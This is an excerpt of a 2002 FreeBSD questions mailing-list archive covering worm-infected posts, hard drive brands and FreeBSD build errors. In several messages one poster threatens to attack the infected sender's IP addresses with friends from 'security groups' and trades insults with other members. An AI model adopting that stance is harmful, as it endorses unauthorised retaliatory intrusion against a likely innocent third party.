g1lEsrWGIEoBgvExcLAW0BSO4eWRVnoWzRq+pE22U05kEQOMFMHlobCVtQyRDoa6KZf1lA== --ljdpkij-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13: 7:37 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id 81E9137B6C3 for ; Tue, 25 Jun 2002 13:06:02 -0700 (PDT) Received: from UNIXHIDEOUT ([192.168.1.10]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5PK5pFv055246; Tue, 25 Jun 2002 16:05:53 -0400 (EDT) (envelope-from root@unixhideout.com) From: "ro0t" To: "John Martinez" , Subject: RE: I hate to bring it up again (spamming) Date: Tue, 25 Jun 2002 16:05:48 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <3D18BEAE.80200@mtbiker.net> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I just posted and complained about this. I have 4 windows boxes on my lan, and three FreeBSD boxes. (I wont use Any unix as a desktop, it just dont cut it, however all my servers are freebsd) Its still no reason to post garbage like that, and if it is a virus no one on my lan is stupid enough to open it anyway. But if i get another one from him theres a very good chance ill start pulling some tricks of my own on edwards ip's which he wont like. I thought this was a list for people to help each other, which is why i signed up. not pinheads. -----Original Message----- From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of John Martinez Sent: Tuesday, June 25, 2002 3:04 PM To: freebsd-questions@FreeBSD.ORG Subject: I hate to bring it up again (spamming) Can one of the list admins please block Edwin Renders (or whoever it is) from posting the stupid DOS files on this list? I use Windows at work occasionally, but I'm not susceptible on my Solaris, FreeBSD or Mac OS X boxes from having problems with .scr files. It's just ANNOYING!!! Thanks, -john To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:10: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id E932537B4A7 for ; Tue, 25 Jun 2002 13:08:36 -0700 (PDT) Received: from UNIXHIDEOUT ([192.168.1.10]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5PK8TFv055353; Tue, 25 Jun 2002 16:08:38 -0400 (EDT) (envelope-from root@unixhideout.com) From: "ro0t" To: "Chad Albert" , Subject: RE: I hate to bring it up again (spamming) Date: Tue, 25 Jun 2002 16:08:26 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <002301c21c80$69e4a920$51b41595@SPGCALBERTA> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I dont care what someone sent him. His only logical resolution is to spam the entire list? I just got about 8 emails from him all in my inbox? And is this a virus or what? Real mature. I didnt know freeBSD supported pinheads. -----Original Message----- From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Chad Albert Sent: Tuesday, June 25, 2002 3:42 PM To: John Martinez; freebsd-questions@FreeBSD.ORG Subject: Re: I hate to bring it up again (spamming) Or has anyone just sent him a friendly "You have a virus" email? ----- Original Message ----- From: "John Martinez" To: Sent: Tuesday, June 25, 2002 2:04 PM Subject: I hate to bring it up again (spamming) > > Can one of the list admins please block Edwin Renders (or whoever it is) > from posting the stupid DOS files on this list? > > I use Windows at work occasionally, but I'm not susceptible on my > Solaris, FreeBSD or Mac OS X boxes from having problems with .scr files. > > It's just ANNOYING!!! > > Thanks, > -john > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.372 / Virus Database: 207 - Release Date: 6/20/2002 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:11:30 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id E552D37B432 for ; Tue, 25 Jun 2002 13:10:05 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com for ; Tue, 25 Jun 2002 13:10:04 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: questions@FreeBSD.ORG Date: Tue, 25 Jun 2002 13:10:05 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: any idea what this means? Reply-To: pjklist@ekahuna.com In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020625201004567.AAA767@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Date: Tue, 25 Jun 2002 07:55:59 -0800 From: Beech Rintoul > I would also recommend Seagate, they seem to hold up better in production > machines than do Maxtor. Above all stay away from IBM. We have three of them > that were bad almost right from the box, and IBM is not being nice about > replacing them. I have beter things to do than a myriad of tests just to get > an RMA. Being new drives I figure they should give us the benefit of the > doubt and test them themselves. One they did replace had bad sectors right > out of the box. If those are 75GXP models, there are known problems with that series. In fact, that model has become rather infamous due to its problems. As it turns out, IBM recently announced it is getting out of the disk drive business altogether - it is selling the division to Hitachi. Could be the 75GXP debacle was the turning-point in that decision. Shortly prior to IBM's decision to get out of HD production, they issued some revised usage recommendations that suggested that those IDE drives were not meant for 24x7 server use. I think that in general the better SCSI drives are designed more with that in mind. My luck with IBM's SCSI drives has been pretty good actually. However my current favorite in SCSI drives is Fujitsu, although they aren't widely distributed via retail. (Fujitsu exited the IDE market, they are now only selling SCSI drives) Seagate is probably my #2 choice. Datapoint: I have had a 1GB Fujitsu SCSI drive (M2694-ES, old 50-pin SCSI-2 model) running 24x7 in a server here for ~2 yrs, and in another server prior to that for probably at least 1-2 yrs more, without a single problem. -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:16:10 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.noos.fr (racine.noos.net [212.198.2.71]) by hub.freebsd.org (Postfix) with ESMTP id 32E1537B793 for ; Tue, 25 Jun 2002 13:14:40 -0700 (PDT) Received: (qmail 17178452 invoked by uid 0); 25 Jun 2002 20:14:38 -0000 Received: from unknown (HELO gits.gits.dyndns.org) ([212.198.229.153]) (envelope-sender ) by 212.198.2.71 (qmail-ldap-1.03) with SMTP for ; 25 Jun 2002 20:14:38 -0000 Received: from gits.gits.dyndns.org (amvju0hpn0dylyaw@localhost [127.0.0.1]) by gits.gits.dyndns.org (8.12.4/8.12.4) with ESMTP id g5PKEbtY013990; Tue, 25 Jun 2002 22:14:37 +0200 (CEST) (envelope-from root@gits.dyndns.org) Received: (from root@localhost) by gits.gits.dyndns.org (8.12.4/8.12.4/Submit) id g5PKEWeO013989; Tue, 25 Jun 2002 22:14:32 +0200 (CEST) (envelope-from root) Date: Tue, 25 Jun 2002 22:14:32 +0200 From: Cyrille Lefevre To: Oliver Braun , questions@FreeBSD.ORG, lucky@land3.nsu.ru Subject: Re: ports in 4.6 Message-ID: <20020625201432.GC11513@gits.dyndns.org> References: <20020625211500.L13414-100000@land3.nsu.ru> <20020625143659.GA59979@informatik.unibw-muenchen.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020625143659.GA59979@informatik.unibw-muenchen.de> User-Agent: Mutt/1.3.99i Organization: ACME X-Face: V|+c;4!|B?E%BE^{E6);aI.[< List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 25, 2002 at 04:36:59PM +0200, Oliver Braun wrote: > * Alexey Privalov [2002-06-25 16:26]: > > i cann`t make some ports: > > > root@land3# make > > ===> Extracting for isc-dhcp3-3.0.1.r9 > > >> Checksum OK for dhcp-3.0.1rc9.tar.gz. > > ===> Applying FreeBSD patches for isc-dhcp3-3.0.1.r9 > > -e: not found > > *** Error code 127 > > workarround: make USE_REINPLACE=yes > > USE_REINPLACE=yes has to be defined before including bsd.port.pre.mk. ok, thanks, I'll take care in the future... Cyrille. -- Cyrille Lefevre mailto:cyrille.lefevre@laposte.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:17:21 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id 9B53A37B4A8 for ; Tue, 25 Jun 2002 13:16:46 -0700 (PDT) Received: from UNIXHIDEOUT ([192.168.1.10]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5PKGkFv055574; Tue, 25 Jun 2002 16:16:46 -0400 (EDT) (envelope-from root@unixhideout.com) From: "ro0t" To: "Ken" , Subject: RE: I hate to bring it up again (spamming) Date: Tue, 25 Jun 2002 16:16:43 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <00ba01c21c84$cf049500$2cc8010a@palacasino.com> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Excellent. Now i know seeing as though he blatently tried to do damage to my network i have full permission to do whatever i like to his ip's. Time to email some of my friends from over 12 main security groups and plan something nice for him. -----Original Message----- From: Ken [mailto:ken@carnahan.ws] Sent: Tuesday, June 25, 2002 4:14 PM To: ro0t Subject: Re: I hate to bring it up again (spamming) It is a virus. Its W32.Yaha.F I believe. That's it's main trick to get into the contact list and start sending all kinds of stuff to everybody on it. It's stealth, and polymorphic. More than likely the user has no idea he has it. It also kills the task manager so you can't see it running in the background. If he's on a dedicated connection, it'll be spouting off like crazy. Norton does catch it, but you can't install Norton after your infected. Just an FYI. ----- Original Message ----- From: "ro0t" To: "John Martinez" ; Sent: Tuesday, June 25, 2002 1:05 PM Subject: RE: I hate to bring it up again (spamming) > I just posted and complained about this. I have 4 windows boxes on my lan, > and three FreeBSD boxes. (I wont use Any unix as a desktop, it just dont cut > it, however all my servers are freebsd) Its still no reason to post garbage > like that, and if it is a virus no one on my lan is stupid enough to open it > anyway. But if i get another one from him theres a very good chance ill > start pulling some tricks of my own on edwards ip's which he wont like. I > thought this was a list for people to help each other, which is why i signed > up. not pinheads. > > -----Original Message----- > From: owner-freebsd-questions@FreeBSD.ORG > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of John Martinez > Sent: Tuesday, June 25, 2002 3:04 PM > To: freebsd-questions@FreeBSD.ORG > Subject: I hate to bring it up again (spamming) > > > > Can one of the list admins please block Edwin Renders (or whoever it is) > from posting the stupid DOS files on this list? > > I use Windows at work occasionally, but I'm not susceptible on my > Solaris, FreeBSD or Mac OS X boxes from having problems with .scr files. > > It's just ANNOYING!!! > > Thanks, > -john > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:19: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id F0F5237B41C for ; Tue, 25 Jun 2002 13:18:33 -0700 (PDT) Received: from UNIXHIDEOUT ([192.168.1.10]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5PKIbFv055618; Tue, 25 Jun 2002 16:18:38 -0400 (EDT) (envelope-from root@unixhideout.com) From: "ro0t" To: "John Martinez" , Subject: RE: I hate to bring it up again (spamming) Date: Tue, 25 Jun 2002 16:18:35 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <3D18CF36.9020408@mtbiker.net> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG -----Original Message----- From: John Martinez [mailto:john@mtbiker.net] Sent: Tuesday, June 25, 2002 4:15 PM To: ro0t Subject: Re: I hate to bring it up again (spamming) ro0t wrote: > I wont use Any unix as a desktop, it just dont cut it Have you tried Mac OS X? You'll be pleasantly surprised. I converted to Mac back in February and have never looked back at Windows. I will never again buy a PC unless it's going to be running a Unix of some sort. Of course, my damn Winbloze laptop at work won't get the same treatment. I'll just make it a dual-boot! ;-) The investment in a Mac is a little steep, but it was worth the cost, IMO. -john Macs are nice from what i hear. =] But i already have 6 computers. hehe. All in my bedroom. Quite hot in here in the summer. And more then enough work for me to update.. But macs are definitely a plan for me in the future. ;) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:19:29 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 67E0C37B41A for ; Tue, 25 Jun 2002 13:18:45 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com for ; Tue, 25 Jun 2002 13:18:41 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: questions@FreeBSD.ORG Date: Tue, 25 Jun 2002 13:18:42 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: spam/virus statistics for this list Reply-To: pjklist@ekahuna.com In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020625201841684.AAA761@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > questions-digest Tuesday, June 25 2002 Volume 05 : Number 1421 > > > > In this issue: > Fw: book > Fw: Interesting Love to enjoy ! > RE: ipfw question > I hate to bring it up again (spamming) > RE: Java on FreeBSD > Fw: Statistics on last digest (see above): Real Messages: 3 (2.5 KB) Viruses: 3 (116 KB) Spam: 0 (0 KB) -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:22:26 2002 Delivered-To: freebsd-questions@freebsd.org Received: from jive.SoftHome.net (jive.SoftHome.net [66.54.152.27]) by hub.freebsd.org (Postfix) with SMTP id 319AC37B401 for ; Tue, 25 Jun 2002 13:22:21 -0700 (PDT) Received: (qmail 6098 invoked by uid 417); 25 Jun 2002 20:22:20 -0000 Received: from shunt-smtp-out-0 (HELO softhome.net) (172.16.3.12) by shunt-smtp-out-0 with SMTP; 25 Jun 2002 20:22:20 -0000 Received: from softhome.net ([63.194.84.111]) (AUTH: PLAIN temperanza@softhome.net) by softhome.net with esmtp; Tue, 25 Jun 2002 14:22:20 -0600 Message-ID: <3D18D0FC.8010407@softhome.net> Date: Tue, 25 Jun 2002 13:22:20 -0700 From: La Temperanza User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020612 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Christopher Schulte , questions Subject: Re: Several questions... References: <5.1.1.6.2.20020625143148.0421d118@pop3s.schulte.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > >> 3. From the first time I've rebuilt my base system, I've been getting >> proc size mismatches such as this: >> >> kvm_open: proc size mismatch (48576 total, 1064 chunks) >> top: Out of memory. >> >> I've tried rebuilding various components at various times with >> various optimization settings, no luck so far. Mainly, I want to >> diagnose the exact problem here, since it doesn't seem to be as >> simple as what the handbook describes. How should I start? > > > Also in the faq (I believe) and possible answer found easily via > http://groups.google.com/ > > Make sure your kernel and userland are in sync. I don't quite get what that means. >.< If a cvsup and rebuilding isn't syncing them, what will? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:25: 7 2002 Delivered-To: freebsd-questions@freebsd.org Received: from windmill-en0.garlic.com (windmill-en0.garlic.com [208.195.160.130]) by hub.freebsd.org (Postfix) with ESMTP id 8605137B401 for ; Tue, 25 Jun 2002 13:24:59 -0700 (PDT) Received: from bathoryaria (149.sm7.dialup.garlic.net [216.139.3.149]) by windmill-en0.garlic.com (8.11.1/8.11.1) with ESMTP id g5PKOvm30020 for ; Tue, 25 Jun 2002 13:24:58 -0700 From: "Remington L." To: Subject: 4.9 buildworld error code 1 Date: Tue, 25 Jun 2002 13:24:32 -0700 Message-ID: <000001c21c86$52c51bc0$95038bd8@bathoryaria> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I'm having a problem upgrading to 4.6 from 4.5-RELEASE-p3. I do, cd /usr/src ; make buildworld and everything runs smoothly till: mkdep -f .depend -a -I/usr/src/lib/libpam/modules/pam_ssh/../../../../crypto/openssh /usr/src/lib/libpam/modules/pam_ssh/pam_ssh.c:48: ssh.h: No such file or directory Also in pam_ssh.c it says im missing: 63: openssl/dsa.h 64: openssl/evp.h 66: key.h 67: authfd.h 68: authfile.h 69: log.h Why am I missing these files? And I don't know if this helps but when I cvsup the source code im using the tag=RELENG_4_6, maybe for some reason that has something to do with it Any help is greatly asppreciated -Remington L. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:26:19 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id A23DE37B401 for ; Tue, 25 Jun 2002 13:26:09 -0700 (PDT) Received: from UNIXHIDEOUT ([192.168.1.10]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5PKQ1Fv055876; Tue, 25 Jun 2002 16:26:03 -0400 (EDT) (envelope-from root@unixhideout.com) From: "ro0t" To: , Subject: RE: any idea what this means? Date: Tue, 25 Jun 2002 16:25:58 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <20020625201004567.AAA767@empty1.ekahuna.com@pc02.ekahuna.com> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG -----Original Message----- From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Philip J. Koenig Sent: Tuesday, June 25, 2002 4:10 PM To: questions@FreeBSD.ORG Subject: Re: any idea what this means? Date: Tue, 25 Jun 2002 07:55:59 -0800 From: Beech Rintoul > I would also recommend Seagate, they seem to hold up better in production > machines than do Maxtor. Above all stay away from IBM. We have three of them > that were bad almost right from the box, and IBM is not being nice about > replacing them. I have beter things to do than a myriad of tests just to get > an RMA. Being new drives I figure they should give us the benefit of the > doubt and test them themselves. One they did replace had bad sectors right > out of the box. If those are 75GXP models, there are known problems with that series. In fact, that model has become rather infamous due to its problems. As it turns out, IBM recently announced it is getting out of the disk drive business altogether - it is selling the division to Hitachi. Could be the 75GXP debacle was the turning-point in that decision. Shortly prior to IBM's decision to get out of HD production, they issued some revised usage recommendations that suggested that those IDE drives were not meant for 24x7 server use. I think that in general the better SCSI drives are designed more with that in mind. My luck with IBM's SCSI drives has been pretty good actually. However my current favorite in SCSI drives is Fujitsu, although they aren't widely distributed via retail. (Fujitsu exited the IDE market, they are now only selling SCSI drives) Seagate is probably my #2 choice. Datapoint: I have had a 1GB Fujitsu SCSI drive (M2694-ES, old 50-pin SCSI-2 model) running 24x7 in a server here for ~2 yrs, and in another server prior to that for probably at least 1-2 yrs more, without a single problem. -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium Well when i bought the motherboard (Abit KT7A-RAID) i had plans for raid but couldnt afford to buy 2 identical drives at that time. (i really still cant lol) So at the time i bought the raid motherboard and disabled raid. but seeing as i _need_ a drive now anyway i found this site http://www.nexthardwareshop.com/ thru pricewatch.com. Lots of stuff fairly cheap. I just dont know what brand. Im pretty sure im going to get another seagate. I had a western digital fail on me, and i had many maxtors fail. (over 3 in 4 years) However i must admit i could get two 120 gigabyte maxtor hard drives for ony a little over 200 dollars at that site and raid them out... *tempting* Im pretty stuck at what im going to do. But i would rather have longevity, and stability so i may get two 80 or 60 gig seagates. :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:30:12 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id 87B7E37B400 for ; Tue, 25 Jun 2002 13:30:02 -0700 (PDT) Received: from UNIXHIDEOUT ([192.168.1.10]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5PKU4Fv056070; Tue, 25 Jun 2002 16:30:06 -0400 (EDT) (envelope-from root@unixhideout.com) From: "ro0t" To: "Remington L." , Subject: RE: 4.9 buildworld error code 1 Date: Tue, 25 Jun 2002 16:30:02 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <000001c21c86$52c51bc0$95038bd8@bathoryaria> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG -----Original Message----- From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Remington L. Sent: Tuesday, June 25, 2002 4:25 PM To: freebsd-questions@FreeBSD.ORG Subject: 4.9 buildworld error code 1 I'm having a problem upgrading to 4.6 from 4.5-RELEASE-p3. I do, cd /usr/src ; make buildworld and everything runs smoothly till: mkdep -f .depend -a -I/usr/src/lib/libpam/modules/pam_ssh/../../../../crypto/openssh /usr/src/lib/libpam/modules/pam_ssh/pam_ssh.c:48: ssh.h: No such file or directory Also in pam_ssh.c it says im missing: 63: openssl/dsa.h 64: openssl/evp.h 66: key.h 67: authfd.h 68: authfile.h 69: log.h Why am I missing these files? And I don't know if this helps but when I cvsup the source code im using the tag=RELENG_4_6, maybe for some reason that has something to do with it Any help is greatly asppreciated -Remington L. This same error drove me nuts. take a look at your cvsup file, instead of many src-xxx requests just put src-all You simply dont have the srces your system requires. Make sure you remove all the other src- requests, and replace with src-all, then run cvsup, let it finish and youll be all set. I wrote a tutorial on this if you want to see it its located here, http://www.unixhideout.com/login/forums/viewtopic.php?t=15&sid=29e3e88f64d55 4ad0bedba414c7e735a To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:33:18 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id BF0AD37B407 for ; Tue, 25 Jun 2002 13:33:07 -0700 (PDT) Received: from UNIXHIDEOUT ([192.168.1.10]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5PKX1Fv056188; Tue, 25 Jun 2002 16:33:02 -0400 (EDT) (envelope-from root@unixhideout.com) From: "ro0t" To: "Jerry McAllister" , Subject: RE: I hate to bring it up again (spamming) Date: Tue, 25 Jun 2002 16:32:58 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <200206252029.g5PKTlC13477@clunix.cl.msu.edu> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG -----Original Message----- From: Jerry McAllister [mailto:jerrymc@clunix.cl.msu.edu] Sent: Tuesday, June 25, 2002 4:30 PM To: ro0t Cc: Jerry McAllister Subject: Re: I hate to bring it up again (spamming) > > I dont care what someone sent him. His only logical resolution is to spam > the entire list? I just got about 8 emails from him all in my inbox? And is > this a virus or what? Real mature. I didnt know freeBSD supported pinheads. Only a REAL PINHEAD would spout off when they don't know what they are talking about and call others pinheads. ////jerry Then why dont you explain to the list why you are still talking. All i know is i joined this list to help people, and im getting sent viruses, and spam for some loser with nothing better to do then mail people who dont want it.. Does anyone on this list want those emails and viruses sent to there email? please speak now? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13:37: 1 2002 Delivered-To: freebsd-questions@freebsd.org Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by hub.freebsd.org (Postfix) with ESMTP id D0CD037B403 for ; Tue, 25 Jun 2002 13:36:55 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id 4A743243F7; Tue, 25 Jun 2002 15:36:54 -0500 (CDT) Received: from schulte-laptop.nospam.schulte.org (nb-65.netbriefings.com [209.134.134.65]) by clink.schulte.org (Postfix) with ESMTP id 52BCA243BE; Tue, 25 Jun 2002 15:36:52 -0500 (CDT) Message-Id: <5.1.1.6.2.20020625153146.044d1278@pop3s.schulte.org> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 25 Jun 2002 15:34:17 -0500 To: La Temperanza , questions From: Christopher Schulte Subject: Re: Several questions... In-Reply-To: <3D18D0FC.8010407@softhome.net> References: 